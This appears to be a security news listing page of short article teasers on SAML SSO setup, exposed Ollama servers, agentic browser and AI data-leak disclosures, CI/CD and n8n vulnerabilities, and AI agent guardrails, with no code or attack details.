Security | Threat Detection | Cyberattacks | DevSecOps | Compliance

Joomla SAML SSO with Salesforce | Step-by-Step SAML SP Setup Guide

Stop managing separate passwords! In this comprehensive tutorial, we’ll show you how to configure SAML Single Sign-On (SSO) for Joomla using Salesforce as your Identity Provider (IdP). By the end of this video, your users will be able to log in to your Joomla site securely using their Salesforce credentials, creating a frictionless enterprise experience.

Discover Exposed AI Infrastructure with Indusface WAS

You track your web applications. You inventory your APIs. But is anybody monitoring your AI servers? Just last week research found that there were more than 175,000 exposed versions of Ollama, an AI server popular for self-hosting LLMs. Across enterprises, self-hosted model servers are being deployed on cloud VMs and GPU-backed instances to power copilots, internal automation, and experimental AI features.

Why EDR isn't enough on its own

Editor's note: The following guest contribution is by Tanium Domain Acrchitect, Jim Kelly Think about your last security event. Was your team confident nothing was missed? Were there questions about where else this could have left persistence? Most often we are left with uncertainty. That uncertainty can show up in every serious incident. An alert fires, the SOC responds. The immediate threat looks like it is contained.

PerplexedBrowser: Accepting a Meeting or Handing Your Local Files to an Attacker?

How a routine calendar invite enabled silent local file access and data exfiltration Note: This post is part of a coordinated disclosure by Zenity Labs detailing the PleaseFix vulnerability family affecting the Perplexity Comet Agentic Browser. This blog focuses on browser-level autonomous agent execution and session compromise.

100 SaaS Apps. One Query. Zero Alerts: How Glean and Claude Cowork Expose the Agentic AI Data Risk

A sales rep opened Glean—an AI-powered enterprise search platform that connects to your company's SaaS apps and lets anyone query across all of them in natural language—typed "Who are my top 10 customers?" and got a clean, formatted list pulled from Salesforce, cross-referenced with HubSpot, and confirmed against data sitting in Google Drive. They copy-pasted that list into a personal Gmail draft. No alerts fired. No policies triggered. No one noticed. This isn't a hypothetical.

How JFrog's AI-Research Bot Found OSS CI/CD Vulnerabilities to Prevent Shai Hulud 3.0

Recent incidents have proven that Continuous Integration (CI) workflows are the new battleground for software supply chain attacks. Security Pitfalls in GitHub Actions workflows, such as the unsanitized use of pull request (PR) data, can allow attackers to execute malicious code during CI runs with devastating consequences.

Four Critical RCE Vulnerabilities in n8n: What Cloud Security Teams Need to Know

Automation platforms sit at the center of modern infrastructure. They connect APIs, databases, CI/CD pipelines, SaaS tools, and internal systems. But when automation engines become compromised, the blast radius can be enormous. In February 2026, n8n, a widely used open-source workflow automation platform, disclosed four critical vulnerabilities that can lead to remote code execution (RCE) by authenticated users with workflow creation or editing permissions.

What to Look for in an AI Workload Security Tool: The Complete Buyer's Guide

You’re evaluating AI workload security tools and every demo looks the same. Vendor A shows you an AI-SPM dashboard. Vendor B shows you a nearly identical AI-SPM dashboard with slightly different branding. Vendor C shows you posture findings with an “AI workload” tag that wasn’t there last quarter.

Runtime Observability for AI Agents: See What Your AI Actually Does

Last Tuesday, a platform security engineer at a mid-size fintech company ran a routine audit on their production Kubernetes clusters. The audit surfaced three LangChain-based agents, two vLLM inference servers, and a Model Context Protocol (MCP) tool runtime. None had been reported by the development teams. None appeared in any security inventory. All had been running for weeks. One of the agents had been making outbound API calls to a third-party data enrichment service every four minutes.

Per-Agent Guardrails: How to Set Different Policies for Different AI Agents

You’ve deployed five AI agents into your production Kubernetes cluster: a customer support chatbot, a fraud detection agent, a data pipeline processor, a code generation assistant, and an internal summarization bot. Your security team writes one set of guardrails and applies them uniformly. Within a week, you discover the code generation agent needs interpreter access the chatbot should never have.